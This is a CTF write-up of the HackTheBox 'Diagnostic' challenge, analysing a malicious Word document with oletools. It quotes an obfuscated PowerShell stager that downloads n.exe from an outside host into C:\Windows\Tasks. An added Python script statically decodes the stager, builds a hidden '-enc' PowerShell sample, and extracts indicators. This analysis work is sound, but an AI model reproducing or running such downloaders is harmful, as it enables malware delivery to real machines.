Microsoft Office Word Document Malware Analysis | HackTheBox Diagnostic

Motasem Hamdan
2 min read · Jan 3, 2024


We covered analyzing a sample Microsoft Office Word document with oletools to extract the relevant macros and links. The sample document contained an external link referencing a web page that hosts JavaScript code. The JS code contained a base64-encoded PowerShell command that calls out to an external domain to retrieve an executable file. This was part of the HackTheBox Diagnostic forensic challenge.

Video Highlights

  • We used oleid and oleobj to analyze the Word document named layoff.doc
  • The document contained an external link which references a web page that contained JavaScript
  • We used the ASCII table to convert the char[58] and char[34] casts into their corresponding ASCII characters (a colon and a double quote)
  • We then used CyberChef to decode the base64, which produced the PowerShell below

# Builds the output file name from a scrambled -f format string; the backtick in ${f`ile} is a PowerShell escape that does nothing here
${f`ile} = ("{7}{1}{6}{8}{5}{3}{2}{4}{0}"-f'}.exe','B{msDt_4s_A_pr0','E','r…s','3Ms_b4D','l3','toC','HT','0l_h4nD')

# The first format string resolves to Invoke-WebRequest, the second to https://automation.diagnostic.htb/2/n.exe
&("{1}{2}{0}{3}"-f'ues','Invoke','-WebReq','t') ("{2}{8}{0}{4}{6}{5}{3}{1}{7}"-f '://au','.htb/2','h','ic','to','agnost','mation.di','/n.exe','ttps') -OutFile "C:\Windows\Tasks\$file"

  • We used PowerShell to evaluate the format-string expressions above; the file name assigned to $file is the challenge flag
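The steps above are done by hand in the video (ASCII table, CyberChef, then evaluating the -f expressions in PowerShell). Evaluating attacker-supplied PowerShell, even a fragment, is a risk worth avoiding, so the following added example (written for this page, not code from the post or the challenge) performs the same three decoding steps statically in Python. It assumes the char casts appear in PowerShell's [char]N syntax joined with +, that the base64 blob sits after an -enc/-EncodedCommand switch, and that the -f calls use plain numeric placeholders as in the sample. The Invoke-WebRequest line is the one shown in the post; the $file line, the JavaScript wrapper and the base64 blob are constructed here so the script runs offline.

```python
"""Static de-obfuscation of a staged PowerShell downloader (added example).

Pipeline: [char]N casts -> base64 -EncodedCommand -> -f format operator -> IOCs.
Nothing is executed; every step is a string rewrite.
"""
import base64
import re

# --- Stage 1: [char]N casts joined with + (assumed syntax) ------------------
CHAR_CAST_RE = re.compile(r"\[char\]\s*(\d+)", re.IGNORECASE)
CONCAT_RE = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")

def decode_char_casts(text):
    """Replace [char]N with the literal character (quoted so the surrounding
    + expression still parses), then fold adjacent single-quoted literals."""
    def quote(m):
        c = chr(int(m.group(1)))
        # a single quote cannot live inside '...' so it is wrapped in "..." and
        # deliberately left unfolded (rare; not in this sample)
        return '"' + c + '"' if c == "'" else "'" + c + "'"
    text = CHAR_CAST_RE.sub(quote, text)
    while True:
        folded = CONCAT_RE.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", text)
        if folded == text:
            return text
        text = folded

# --- Stage 2: the base64 blob ----------------------------------------------
B64_RE = re.compile(r'-e[a-z]*\s+"?([A-Za-z0-9+/=]{16,})', re.IGNORECASE)

def decode_encoded_command(blob):
    """-EncodedCommand carries UTF-16LE; a blob pasted from elsewhere may be
    UTF-8, so sniff the second byte before choosing the decoder."""
    raw = base64.b64decode(blob)
    if len(raw) >= 2 and raw[1] == 0:
        return raw.decode("utf-16-le")
    return raw.decode("utf-8")

# --- Stage 3: the -f format operator ---------------------------------------
FORMAT_RE = re.compile(
    r"""\(\s*"((?:\{\d+\})+)"\s*-f\s*((?:'[^']*'\s*,\s*)*'[^']*')\s*\)""",
    re.IGNORECASE,
)

def resolve_format(fmt, args):
    """Expand "{7}{1}..." against its argument list (no alignment specs)."""
    return re.sub(r"\{(\d+)\}", lambda m: args[int(m.group(1))], fmt)

def deobfuscate_format_ops(ps):
    """Rewrite every ("{..}" -f 'a','b') into the literal it evaluates to and
    drop the backtick in ${f`ile}, which is an escape that does nothing."""
    def repl(m):
        args = [a[1:-1] for a in re.findall(r"'[^']*'", m.group(2))]
        return "'" + resolve_format(m.group(1), args) + "'"
    ps = FORMAT_RE.sub(repl, ps)
    return re.sub(r"\$\{([^}]*)\}", lambda m: "$" + m.group(1).replace("`", ""), ps)

# --- IOC extraction --------------------------------------------------------
def extract_iocs(ps):
    return {
        "urls": re.findall(r"https?://[^\s'\"]+", ps),
        "paths": re.findall(r"[A-Za-z]:\\[^\s'\"]+", ps),
    }

def analyse(stage1):
    """Run the whole chain and return the cleaned PowerShell plus its IOCs."""
    stage1 = decode_char_casts(stage1)
    blob = B64_RE.search(stage1)
    if blob is None:
        raise ValueError("no -EncodedCommand blob found")
    ps = deobfuscate_format_ops(decode_encoded_command(blob.group(1)))
    return {"powershell": ps, **extract_iocs(ps)}

# --- Constructed sample -----------------------------------------------------
# Second line is the downloader from the post; the $file line is made up.
OBFUSCATED_PS = (
    "${f`ile} = (\"{1}{0}\" -f 'load.exe','pay')\n"
    "&(\"{1}{2}{0}{3}\"-f'ues','Invoke','-WebReq','t') "
    "(\"{2}{8}{0}{4}{6}{5}{3}{1}{7}\"-f '://au','.htb/2','h','ic','to','agnost',"
    "'mation.di','/n.exe','ttps') -OutFile \"C:\\Windows\\Tasks\\$file\""
)
# Simulated JS stage: the blob is base64(UTF-16LE) of the PowerShell above,
# wrapped in [char]34 the way the real sample hid ':' and '"'.
_BLOB = base64.b64encode(OBFUSCATED_PS.encode("utf-16-le")).decode()
STAGE1 = "var c = 'powershell -w hidden -enc ' + [char]34 + '" + _BLOB + "' + [char]34;"

if __name__ == "__main__":
    result = analyse(STAGE1)
    print(result["powershell"])
    print("URLs:", result["urls"])
    print("Paths:", result["paths"])
```

Run on STAGE1 the script prints the two cleaned lines ($file = 'payload.exe' and the Invoke-WebRequest call with its literal URL) followed by the URL and the C:\Windows\Tasks\ drop path, which are the indicators you would block or hunt for. The regexes are deliberately narrow: a format string with alignment specs such as {0,10}, or arguments containing an escaped quote, will not match and will be left as-is rather than silently mis-decoded.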

Video Walkthrough


Motasem Hamdan

Motasem Hamdan is a content creator and swimmer who creates cyber security training videos and articles. https://www.youtube.com/@MotasemHamdan